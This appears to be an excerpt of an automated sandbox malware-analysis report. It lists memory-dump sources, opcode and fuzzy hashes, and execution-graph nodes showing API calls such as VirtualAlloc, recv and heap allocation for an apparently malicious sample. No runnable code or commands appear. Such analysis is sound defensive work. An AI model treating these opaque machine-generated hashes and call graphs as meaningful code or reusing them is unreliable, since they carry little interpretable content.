                                                    • Instruction Fuzzy Hash: 1AF02BEBA0E519AE7256C1122B086F6172FD5C7631730C473F403CBA01D15C4D475931
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.1998822145.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5370000_DocumentsIIEBGIDAAF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c774f2fb0898136f453813de29ffec63c42f68ff4590ca910044c7aca710d077
                                                    • Instruction ID: d20cfbe75b9e3237e4789937c32c3cfd59b17271aa9ba9deb90b7e3826cc140d
                                                    • Opcode Fuzzy Hash: c774f2fb0898136f453813de29ffec63c42f68ff4590ca910044c7aca710d077
                                                    • Instruction Fuzzy Hash: 72E068EB84EC1CDFB1A5D2027E5D6F6632FD2E4B21B20C422F403D6A42E29C058E4832
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.1998822145.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5370000_DocumentsIIEBGIDAAF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5025537c16cda2d46f4ef1b67c7bfb7eb709a2d076329f3bec174fec75e6a14d
                                                    • Instruction ID: 3e96af0513dce699da217ae282aab4b26cd4d8b0332aa20b7bbc90a74e5fb209
                                                    • Opcode Fuzzy Hash: 5025537c16cda2d46f4ef1b67c7bfb7eb709a2d076329f3bec174fec75e6a14d
                                                    • Instruction Fuzzy Hash: 1AF0E5E390EA84AF9692C215A95D9F27F7DE9D262073084AFF483CA402D209451A9A33

                                                    Execution Graph

                                                    Execution Coverage:0.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:2
                                                    Total number of Limit Nodes:0
                                                    execution_graph 848 14f679 VirtualAlloc 849 14f693 848->849

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 14f679-14f687 VirtualAlloc 1 14f693 0->1 2 14f69e 1->2 2->2
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000001.1974084355.000000000014B000.00000040.00000001.01000000.00000009.sdmp, Offset: 0014B000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_1_14b000_skotes.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: a59bb58d7ff7358920292f98827a44bfd6d8ea17366587cdd45d8f114f0bd7ff
                                                    • Instruction ID: 730520e31463b72b0bcf1f871071fbcb7cb19562df2c3a18c5df551e7863601c
                                                    • Opcode Fuzzy Hash: a59bb58d7ff7358920292f98827a44bfd6d8ea17366587cdd45d8f114f0bd7ff
                                                    • Instruction Fuzzy Hash: A8D0C93440C18E8BCB095F74845C0DD3FA0EE0B2227144784AC668AAD2C7264C62DA14

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 3 1c42b1-1c4582
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000001.1974084355.000000000014B000.00000040.00000001.01000000.00000009.sdmp, Offset: 0014B000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_1_14b000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ~gw$~gw
                                                    • API String ID: 0-1242061632
                                                    • Opcode ID: 00fc816a19648454dc229e57e2953e8560d55a0b18fb95ea806f0e1d7b194904
                                                    • Instruction ID: e42f421c6da6da3f6a9cae4c47ba46a1df693b666d0b7ac20a6514f216be5737
                                                    • Opcode Fuzzy Hash: 00fc816a19648454dc229e57e2953e8560d55a0b18fb95ea806f0e1d7b194904
                                                    • Instruction Fuzzy Hash: AC7156B3A082105FF308AE29DC8573AF7D6EF98310F1A853DEAC5D7784DA756C018686

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 6 1c047e-1c0654
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000001.1974084355.000000000014B000.00000040.00000001.01000000.00000009.sdmp, Offset: 0014B000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_1_14b000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8o1+
                                                    • API String ID: 0-1035042237
                                                    • Opcode ID: 5f932f68b5e0033171586dd752a4efb0020737b105b3a3404ee2cd94852b2a97
                                                    • Instruction ID: 8989e89c17ec675f2ae3ded63c5c8b50821fcb475feb9357d56fa03b5c9c3cd0
                                                    • Opcode Fuzzy Hash: 5f932f68b5e0033171586dd752a4efb0020737b105b3a3404ee2cd94852b2a97
                                                    • Instruction Fuzzy Hash: FB4159F7B083045BE3086D69ECC577BBBD9EBD5320F2A423DDB8583B84E97958014296
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000001.1974084355.000000000014B000.00000040.00000001.01000000.00000009.sdmp, Offset: 0014B000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_1_14b000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bdd9074234803cf58b31a6e33681c3dc974394e4bb7507132190104384e69ced
                                                    • Instruction ID: 6ebe864648156f02ea3b3a7de03fa45ea55c6584c249a4ea3735b0c3ec36d259
                                                    • Opcode Fuzzy Hash: bdd9074234803cf58b31a6e33681c3dc974394e4bb7507132190104384e69ced
                                                    • Instruction Fuzzy Hash: C48121B3E082144BF3089E39DC9577ABAD6DB90320F2B853DDB89DB6C4D9794C064285
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000001.1974084355.000000000014B000.00000040.00000001.01000000.00000009.sdmp, Offset: 0014B000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_1_14b000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62601d460647a32f6e89fc8d70de59e602508d94667232ce384ba545eadf864f
                                                    • Instruction ID: ffd1af41d6925c151304c9521a2f1dff9a367d551f957d67eb93f5747318b895
                                                    • Opcode Fuzzy Hash: 62601d460647a32f6e89fc8d70de59e602508d94667232ce384ba545eadf864f
                                                    • Instruction Fuzzy Hash: B77119F3E082105BF3546E2DDC49376B7D6DBC4320F2A853DEAC993784E93A6D058686
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000001.1974084355.000000000014B000.00000040.00000001.01000000.00000009.sdmp, Offset: 0014B000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_1_14b000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b417fb0f4166bb367fdbbb9feccfa3f2d8345394f8605ede2b01857cad5a36a5
                                                    • Instruction ID: 804d4a4cc2fca302f31e7102f9e85389de59bdb93c80ed9dc7da3db13013549f
                                                    • Opcode Fuzzy Hash: b417fb0f4166bb367fdbbb9feccfa3f2d8345394f8605ede2b01857cad5a36a5
                                                    • Instruction Fuzzy Hash: 725126F3A082145BE3006A2DEC4576AB7DADF94720F2B453DEAD4C3340F979AC1186C6
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000001.1974084355.000000000014B000.00000040.00000001.01000000.00000009.sdmp, Offset: 0014B000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_1_14b000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2f2d9256f8e6808b8f864d24c081894a364b7464186f13c7cdae948dc548fcf0
                                                    • Instruction ID: 7bd94eec396c1d13d2f5d605927623eacd4456f18a1bd38ec1ed0e22c09606ee
                                                    • Opcode Fuzzy Hash: 2f2d9256f8e6808b8f864d24c081894a364b7464186f13c7cdae948dc548fcf0
                                                    • Instruction Fuzzy Hash: 0F5125F3E043145BE308693CED5937AB795DB84720F1A823DDE89577C4EC795C088282
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000001.1974084355.000000000014B000.00000040.00000001.01000000.00000009.sdmp, Offset: 0014B000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_1_14b000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 424bf3a5f2fdf47a6a557968444c83cb5359ba86e1c7f76af7258f2ed8fb2469
                                                    • Instruction ID: 33d55a1526654d42ec5bcff974e45efa40ff5d3b5c5d631dc5f11774d59a44aa
                                                    • Opcode Fuzzy Hash: 424bf3a5f2fdf47a6a557968444c83cb5359ba86e1c7f76af7258f2ed8fb2469
                                                    • Instruction Fuzzy Hash: F6519CB3F106344BF3644D69DC983A2A6839BA5320F2F41788E4C6B3C5D9BE1C4A93C4
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000001.1974084355.000000000014B000.00000040.00000001.01000000.00000009.sdmp, Offset: 0014B000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_1_14b000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4d1c25467d04a6737db5918a024f2fc6deff697457cdcabec4703628cc6d925
                                                    • Instruction ID: 61a06d622bf22d87772bbdad8ce475a5148cc042fde01ac4005b476787b0c425
                                                    • Opcode Fuzzy Hash: e4d1c25467d04a6737db5918a024f2fc6deff697457cdcabec4703628cc6d925
                                                    • Instruction Fuzzy Hash: 0D5189B361C3009FE3489D3DDD9573BB7D6EBD8320F2AC23DA68587B98E97858064116
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000001.1974084355.000000000014B000.00000040.00000001.01000000.00000009.sdmp, Offset: 0014B000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_1_14b000_skotes.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb1936e6ed3bf177bf2714ce0baf8a267af37a6b2182c715e19c8dc7f1592e76
                                                    • Instruction ID: 9b3fb10e9f0d3f0eed5f4b6094ee29d693ed29c1ed1cb33fb975856fff9aa52b
                                                    • Opcode Fuzzy Hash: fb1936e6ed3bf177bf2714ce0baf8a267af37a6b2182c715e19c8dc7f1592e76
                                                    • Instruction Fuzzy Hash: C841BFB3F042100BF348492CDCA5766B2D79B95720F2F423E9A4A977D0EC7D5C064299

                                                    Execution Graph

                                                    Execution Coverage:11%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:3.2%
                                                    Total number of Nodes:1894
                                                    Total number of Limit Nodes:110
                                                    execution_graph 12419 fb92e 12424 fb7b5 12419->12424 12421 fb956 12432 fb718 12421->12432 12423 fb96f 12425 fb7c1 Concurrency::details::_Reschedule_chore 12424->12425 12426 fb7f2 12425->12426 12427 fc6ac GetSystemTimePreciseAsFileTime 12425->12427 12426->12421 12428 fb7d6 12427->12428 12442 e2b10 12428->12442 12430 fb7dc __Mtx_unlock 12431 e2b10 6 API calls 12430->12431 12431->12426 12433 fb724 Concurrency::details::_Reschedule_chore 12432->12433 12434 fc6ac GetSystemTimePreciseAsFileTime 12433->12434 12441 fb77e 12433->12441 12435 fb739 12434->12435 12436 e2b10 6 API calls 12435->12436 12437 fb73f __Mtx_unlock 12436->12437 12438 e2b10 6 API calls 12437->12438 12439 fb75c __Cnd_broadcast 12438->12439 12440 e2b10 6 API calls 12439->12440 12439->12441 12440->12441 12441->12423 12443 e2b1c 12442->12443 12444 e2b1a 12442->12444 12445 fc26a 6 API calls 12443->12445 12444->12430 12446 e2b22 12445->12446 12447 1138af ___std_exception_copy RtlAllocateHeap 12446->12447 12448 e2b68 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12447->12448 12448->12430 12068 ee500 12069 ee525 12068->12069 12070 ee509 12068->12070 12070->12069 12072 ee360 12070->12072 12073 ee370 __dosmaperr 12072->12073 12080 118ab6 12073->12080 12081 118ad1 12080->12081 12087 118868 12081->12087 12083 ee3ad 12084 fc199 12083->12084 12181 fc0e9 12084->12181 12086 fc1aa std::_Throw_future_error 12088 11887a 12087->12088 12092 11888f __cftof __dosmaperr 12088->12092 12093 11690a 12088->12093 12091 1188bf 12091->12092 12099 116d52 12091->12099 12092->12083 12094 116921 12093->12094 12095 11692a 12093->12095 12094->12091 12095->12094 12105 11b5fb 12095->12105 12100 116d8f 12099->12100 12101 116d5f 12099->12101 12168 11b67d 12100->12168 12104 116d6e __fassign 12101->12104 12163 11b6a1 12101->12163 12104->12091 12106 116960 12105->12106 12107 11b60e 12105->12107 12109 11b628 12106->12109 12107->12106 12113 11f5ab 12107->12113 12110 11b650 12109->12110 12111 11b63b 12109->12111 12110->12094 12111->12110 12146 11e6b1 12111->12146 12115 11f5b7 __fassign 12113->12115 12114 11f606 12114->12106 12115->12114 12118 118bec 12115->12118 12117 11f62b 12119 118bf1 __fassign 12118->12119 12122 118bfc __cftof 12119->12122 12126 11d634 12119->12126 12133 1165ed 12122->12133 12123 11d867 RtlAllocateHeap 12124 11d87a __dosmaperr 12123->12124 12125 118c2f __fassign 12123->12125 12124->12117 12125->12123 12125->12124 12128 11d640 __fassign 12126->12128 12127 11d69c __cftof __dosmaperr __fassign 12127->12122 12128->12127 12129 1165ed __fassign 2 API calls 12128->12129 12132 11d82e __fassign 12129->12132 12130 11d867 RtlAllocateHeap 12131 11d87a __dosmaperr 12130->12131 12130->12132 12131->12122 12132->12130 12132->12131 12136 1164c7 12133->12136 12137 1164d5 __fassign 12136->12137 12138 116520 12137->12138 12141 11652b 12137->12141 12138->12125 12142 11a302 __fassign GetPEB 12141->12142 12143 116535 12142->12143 12144 11653a GetPEB 12143->12144 12145 11654a __fassign 12143->12145 12144->12145 12147 11e6bb 12146->12147 12150 11e5c9 12147->12150 12149 11e6c1 12149->12110 12154 11e5d5 __fassign ___free_lconv_mon 12150->12154 12151 11e5f6 12151->12149 12152 118bec __fassign 4 API calls 12153 11e668 12152->12153 12155 11e6a4 12153->12155 12159 11a72e 12153->12159 12154->12151 12154->12152 12155->12149 12160 11a751 12159->12160 12161 118bec __fassign 4 API calls 12160->12161 12162 11a7c7 12161->12162 12164 11690a __fassign 5 API calls 12163->12164 12165 11b6be 12164->12165 12167 11b6ce __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12165->12167 12172 11f1bf 12165->12172 12167->12104 12169 11b688 12168->12169 12170 11b5fb __fassign 4 API calls 12169->12170 12171 11b698 12170->12171 12171->12104 12173 11690a __fassign 5 API calls 12172->12173 12174 11f1df __fassign 12173->12174 12176 11f232 __cftof __fassign __freea __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12174->12176 12177 11b04b 12174->12177 12176->12167 12179 11b087 __dosmaperr 12177->12179 12180 11b059 __fassign 12177->12180 12178 11b074 RtlAllocateHeap 12178->12179 12178->12180 12179->12176 12180->12178 12180->12179 12184 e22e0 12181->12184 12183 fc0fb 12183->12086 12185 1138af ___std_exception_copy RtlAllocateHeap 12184->12185 12186 e2317 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12185->12186 12186->12183 13878 e8780 13879 e8786 13878->13879 13880 116729 RtlAllocateHeap 13879->13880 13881 e8793 13880->13881 13882 e87a6 13881->13882 13883 1167b7 5 API calls 13881->13883 13884 e87a0 13883->13884 13926 eb1a0 13927 eb1f2 13926->13927 13928 f80c0 RtlAllocateHeap 13927->13928 13929 eb233 13928->13929 13930 f7a00 RtlAllocateHeap 13929->13930 13931 eb2dd 13930->13931 13947 ee0c0 recv 13948 ee122 recv 13947->13948 13949 ee157 recv 13948->13949 13950 ee191 13949->13950 13951 ee2b3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13950->13951 13952 fc6ac GetSystemTimePreciseAsFileTime 13950->13952 13953 ee2ee 13952->13953 13954 fc26a 6 API calls 13953->13954 13955 ee358 13954->13955 14030 ec8e0 14031 ec937 14030->14031 14036 f8de0 14031->14036 14033 ec94c 14034 f8de0 RtlAllocateHeap 14033->14034 14035 ec988 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 14034->14035 14037 f8f2f 14036->14037 14038 f8e05 14036->14038 14039 f9270 RtlAllocateHeap 14037->14039 14042 f8e4c 14038->14042 14043 f8e76 14038->14043 14040 f8f34 14039->14040 14041 e2480 RtlAllocateHeap 14040->14041 14047 f8e5d shared_ptr __cftof 14041->14047 14042->14040 14044 f8e57 14042->14044 14046 fd3e2 RtlAllocateHeap 14043->14046 14043->14047 14045 fd3e2 RtlAllocateHeap 14044->14045 14045->14047 14046->14047 14047->14033 13956 f79c0 13957 f79e0 13956->13957 13957->13957 13958 f80c0 RtlAllocateHeap 13957->13958 13959 f79f2 13958->13959 14048 f88e0 14049 f8ac7 14048->14049 14051 f8936 14048->14051 14050 f91e0 RtlAllocateHeap 14049->14050 14059 f898d shared_ptr 14050->14059 14052 f8ac2 14051->14052 14053 f897c 14051->14053 14054 f89a3 14051->14054 14055 e2480 RtlAllocateHeap 14052->14055 14053->14052 14056 f8987 14053->14056 14058 fd3e2 RtlAllocateHeap 14054->14058 14054->14059 14055->14049 14057 fd3e2 RtlAllocateHeap 14056->14057 14057->14059 14058->14059 14060 f93e0 14061 f9433 14060->14061 14062 f93f5 14060->14062 14068 fd111 14062->14068 14070 fd122 14068->14070 14069 f93ff 14069->14061 14072 fd64e 14069->14072 14070->14069 14079 fd199 14070->14079 14083 fd621 14072->14083 14075 fd0c7 14077 fd0d6 14075->14077 14076 fd17f 14076->14061 14077->14076 14078 fd17b RtlWakeAllConditionVariable 14077->14078 14078->14061 14080 fd1a7 SleepConditionVariableCS 14079->14080 14082 fd1c0 14079->14082 14080->14082 14082->14070 14084 fd637 14083->14084 14085 fd630 14083->14085 14092 1198fa 14084->14092 14089 11988e 14085->14089 14088 f9429 14088->14075 14090 1198fa RtlAllocateHeap 14089->14090 14091 1198a0 14090->14091 14091->14088 14095 119630 14092->14095 14094 11992b 14094->14088 14096 11963c __fassign 14095->14096 14099 11968b 14096->14099 14098 119657 14098->14094 14100 1196a7 14099->14100 14104 119714 __fassign ___free_lconv_mon 14099->14104 14101 1196f4 ___free_lconv_mon 14100->14101 14100->14104 14105 11edf6 14100->14105 14103 11edf6 RtlAllocateHeap 14101->14103 14101->14104 14103->14104 14104->14098 14106 11ee03 14105->14106 14108 11ee0f __cftof __dosmaperr 14106->14108 14109 12500f 14106->14109 14108->14101 14110 12501c 14109->14110 14112 125024 __dosmaperr __fassign ___free_lconv_mon 14109->14112 14111 11b04b __fassign RtlAllocateHeap 14110->14111 14111->14112 14112->14108 12572 116a44 12573 116a52 12572->12573 12574 116a5c 12572->12574 12579 11698d 12574->12579 12576 116a76 12582 1168ed 12576->12582 12578 116a83 ___free_lconv_mon 12580 11690a __fassign 5 API calls 12579->12580 12581 11699f 12580->12581 12581->12576 12585 11683b 12582->12585 12584 116905 12584->12578 12586 116863 12585->12586 12591 116849 __dosmaperr __fassign 12585->12591 12587 11686a 12586->12587 12589 116889 __fassign 12586->12589 12587->12591 12592 1169e6 12587->12592 12590 1169e6 RtlAllocateHeap 12589->12590 12589->12591 12590->12591 12591->12584 12593 1169f4 12592->12593 12596 116a25 12593->12596 12597 11b04b __fassign RtlAllocateHeap 12596->12597 12598 116a05 12597->12598 12598->12591 13932 fb8b9 13933 fb7b5 7 API calls 13932->13933 13934 fb8e1 Concurrency::details::_Reschedule_chore 13933->13934 13936 fb906 13934->13936 13939 fcbae 13934->13939 13937 fb718 7 API calls 13936->13937 13938 fb91e 13937->13938 13940 fcbcc 13939->13940 13941 fcbbc TpCallbackUnloadDllOnCompletion 13939->13941 13940->13936 13941->13940 12449 116629 12450 1164c7 __fassign 2 API calls 12449->12450 12451 11663a 12450->12451 12024 e7430 12037 f7a00 12024->12037 12026 e7465 12027 f7a00 RtlAllocateHeap 12026->12027 12028 e7478 12027->12028 12029 f7a00 RtlAllocateHeap 12028->12029 12030 e7488 12029->12030 12031 f7a00 RtlAllocateHeap 12030->12031 12032 e749d 12031->12032 12033 f7a00 RtlAllocateHeap 12032->12033 12034 e74b2 12033->12034 12035 f7a00 RtlAllocateHeap 12034->12035 12036 e74c4 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12035->12036 12038 f7a26 12037->12038 12039 f7a2d 12038->12039 12040 f7a62 12038->12040 12041 f7a81 12038->12041 12039->12026 12042 f7ab9 12040->12042 12043 f7a69 12040->12043 12044 fd3e2 RtlAllocateHeap 12041->12044 12047 f7a6f __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 12041->12047 12056 e2480 12042->12056 12048 fd3e2 12043->12048 12044->12047 12047->12026 12050 fd3e7 __fassign 12048->12050 12051 fd401 12050->12051 12052 e2480 std::_Throw_future_error 12050->12052 12060 118be1 12050->12060 12051->12047 12055 fd40d std::_Throw_future_error 12052->12055 12064 1138af 12052->12064 12054 e24c3 12054->12047 12055->12047 12057 e248e std::_Throw_future_error 12056->12057 12058 1138af ___std_exception_copy RtlAllocateHeap 12057->12058 12059 e24c3 12058->12059 12059->12047 12063 11b04b __fassign 12060->12063 12061 11b074 RtlAllocateHeap 12062 11b087 __dosmaperr 12061->12062 12061->12063 12062->12050 12063->12061 12063->12062 12065 1138d9 ___std_exception_destroy ___std_exception_copy 12064->12065 12066 1138bc 12064->12066 12065->12054 12066->12065 12067 118be1 ___std_exception_copy RtlAllocateHeap 12066->12067 12067->12065 12452 e8b30 12453 e8b7c 12452->12453 12454 f7a00 RtlAllocateHeap 12453->12454 12455 e8b8c 12454->12455 12464 e5c10 12455->12464 12457 e8b97 12458 f80c0 RtlAllocateHeap 12457->12458 12459 e8be3 12458->12459 12460 f80c0 RtlAllocateHeap 12459->12460 12461 e8c35 12460->12461 12471 f8220 12461->12471 12463 e8c47 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12479 e5940 12464->12479 12468 e5c6a 12498 e4b30 12468->12498 12470 e5c7b shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12470->12457 12472 f8248 12471->12472 12473 f8292 12471->12473 12472->12473 12474 f8251 12472->12474 12476 f8f40 RtlAllocateHeap 12473->12476 12478 f82a1 12473->12478 12555 f9280 12474->12555 12476->12478 12477 f825a 12477->12463 12478->12463 12505 f7f80 12479->12505 12481 e596b 12482 e59e0 12481->12482 12483 f7f80 RtlAllocateHeap 12482->12483 12496 e5a45 12483->12496 12484 f7a00 RtlAllocateHeap 12484->12496 12485 e5c09 12524 f8200 12485->12524 12486 e5bdd __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12486->12468 12488 f80c0 RtlAllocateHeap 12488->12496 12490 e5940 RtlAllocateHeap 12492 e5c54 12490->12492 12493 e59e0 6 API calls 12492->12493 12494 e5c6a 12493->12494 12495 e4b30 6 API calls 12494->12495 12497 e5c7b shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12495->12497 12496->12484 12496->12485 12496->12486 12496->12488 12518 e5730 12496->12518 12497->12468 12499 e4dc2 12498->12499 12503 e4b92 12498->12503 12499->12470 12501 e4ce5 12501->12499 12502 f8ca0 RtlAllocateHeap 12501->12502 12502->12501 12503->12501 12533 116da6 12503->12533 12538 f8ca0 12503->12538 12508 f7f9e __cftof 12505->12508 12509 f7fc7 12505->12509 12506 f9270 RtlAllocateHeap 12507 f80b8 12506->12507 12510 e2480 RtlAllocateHeap 12507->12510 12508->12481 12511 f801b 12509->12511 12513 f803e 12509->12513 12516 f802c __cftof 12509->12516 12512 f80bd 12510->12512 12511->12507 12514 fd3e2 RtlAllocateHeap 12511->12514 12515 fd3e2 RtlAllocateHeap 12513->12515 12513->12516 12514->12516 12515->12516 12516->12506 12517 f8095 shared_ptr 12516->12517 12517->12481 12522 e5860 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12518->12522 12523 e5799 shared_ptr 12518->12523 12519 e592a 12521 f8200 RtlAllocateHeap 12519->12521 12520 f80c0 RtlAllocateHeap 12520->12523 12521->12522 12522->12496 12523->12519 12523->12520 12523->12522 12527 fc1d9 12524->12527 12526 e5c0e 12526->12490 12530 fc15d 12527->12530 12529 fc1ea std::_Throw_future_error 12529->12526 12531 e22e0 std::future_error::future_error RtlAllocateHeap 12530->12531 12532 fc16f 12531->12532 12532->12529 12534 116db4 12533->12534 12536 116dc2 __fassign 12533->12536 12550 116d19 12534->12550 12536->12503 12539 f8dc9 12538->12539 12542 f8cc3 12538->12542 12540 f9270 RtlAllocateHeap 12539->12540 12541 f8dce 12540->12541 12545 e2480 RtlAllocateHeap 12541->12545 12543 f8d2f 12542->12543 12544 f8d05 12542->12544 12548 fd3e2 RtlAllocateHeap 12543->12548 12549 f8d16 shared_ptr 12543->12549 12544->12541 12546 f8d10 12544->12546 12545->12549 12547 fd3e2 RtlAllocateHeap 12546->12547 12547->12549 12548->12549 12549->12503 12551 11690a __fassign 5 API calls 12550->12551 12552 116d2c 12551->12552 12553 116d52 5 API calls 12552->12553 12554 116d3d 12553->12554 12554->12503 12556 f9294 12555->12556 12559 f92a5 12556->12559 12560 f94e0 12556->12560 12558 f932b 12558->12477 12559->12477 12561 f950b 12560->12561 12562 f9619 12560->12562 12566 f9579 12561->12566 12567 f9552 12561->12567 12563 f9270 RtlAllocateHeap 12562->12563 12564 f961e 12563->12564 12565 e2480 RtlAllocateHeap 12564->12565 12571 f9563 shared_ptr 12565->12571 12570 fd3e2 RtlAllocateHeap 12566->12570 12566->12571 12567->12564 12568 f955d 12567->12568 12569 fd3e2 RtlAllocateHeap 12568->12569 12569->12571 12570->12571 12571->12558 13885 e7990 13886 f7a00 RtlAllocateHeap 13885->13886 13887 e79db 13886->13887 13888 e5c10 6 API calls 13887->13888 13889 e79e3 13888->13889 13890 f8320 RtlAllocateHeap 13889->13890 13891 e79f3 13890->13891 13892 f7a00 RtlAllocateHeap 13891->13892 13893 e7a0e 13892->13893 13894 e5c10 6 API calls 13893->13894 13895 e7a15 13894->13895 13896 f80c0 RtlAllocateHeap 13895->13896 13898 e7a38 shared_ptr 13896->13898 13897 e7aa5 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13898->13897 13919 e6d70 13898->13919 13900 f7a00 RtlAllocateHeap 13902 e7b75 13900->13902 13901 e7b1b shared_ptr 13901->13900 13918 e7c06 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13901->13918 13903 e5c10 6 API calls 13902->13903 13904 e7b7d 13903->13904 13905 f7a00 RtlAllocateHeap 13904->13905 13906 e7b98 13905->13906 13907 e5c10 6 API calls 13906->13907 13908 e7ba0 13907->13908 13909 f8320 RtlAllocateHeap 13908->13909 13910 e7bb1 13909->13910 13911 f8220 RtlAllocateHeap 13910->13911 13912 e7bc1 13911->13912 13913 f7a00 RtlAllocateHeap 13912->13913 13914 e7bdc 13913->13914 13915 e5c10 6 API calls 13914->13915 13916 e7be3 13915->13916 13917 f80c0 RtlAllocateHeap 13916->13917 13917->13918 13920 e6db0 13919->13920 13921 e6dca 13920->13921 13922 e6df5 13920->13922 13923 f80c0 RtlAllocateHeap 13921->13923 13924 f80c0 RtlAllocateHeap 13922->13924 13925 e6deb shared_ptr 13923->13925 13924->13925 13925->13901 13943 e91b0 13944 e91e5 13943->13944 13945 f80c0 RtlAllocateHeap 13944->13945 13946 e9218 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 13945->13946 12187 fa210 12188 fa290 12187->12188 12200 f71d0 12188->12200 12190 fa330 12220 e3840 12190->12220 12191 fa2cc 12191->12190 12208 f7d50 12191->12208 12194 fa39e shared_ptr 12195 fd3e2 RtlAllocateHeap 12194->12195 12197 fa4be shared_ptr 12194->12197 12196 fa45e 12195->12196 12228 e3ee0 12196->12228 12199 fa4a6 12201 f7211 12200->12201 12202 fd3e2 RtlAllocateHeap 12201->12202 12203 f7238 12202->12203 12204 fd3e2 RtlAllocateHeap 12203->12204 12205 f7446 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12203->12205 12206 f73bb __cftof 12204->12206 12205->12191 12234 e2ec0 12206->12234 12209 f7dcb 12208->12209 12210 f7d62 12208->12210 12211 e2480 RtlAllocateHeap 12209->12211 12212 f7d6d 12210->12212 12213 f7d9c 12210->12213 12215 f7d7a 12211->12215 12212->12209 12216 f7d74 12212->12216 12214 f7db9 12213->12214 12217 fd3e2 RtlAllocateHeap 12213->12217 12214->12190 12215->12190 12218 fd3e2 RtlAllocateHeap 12216->12218 12219 f7da6 12217->12219 12218->12215 12219->12190 12221 e38f6 12220->12221 12225 e385f 12220->12225 12221->12194 12222 e391b 12380 f91e0 12222->12380 12225->12221 12225->12222 12227 e38cd shared_ptr 12225->12227 12226 f7d50 RtlAllocateHeap 12226->12221 12227->12226 12229 e3f1e 12228->12229 12230 e3f48 12228->12230 12229->12199 12231 e3f58 12230->12231 12383 e2c00 12230->12383 12231->12199 12235 e2f7e GetCurrentThreadId 12234->12235 12236 e2f06 12234->12236 12237 e2fef 12235->12237 12238 e2f94 12235->12238 12274 fc6ac 12236->12274 12237->12205 12238->12237 12245 fc6ac GetSystemTimePreciseAsFileTime 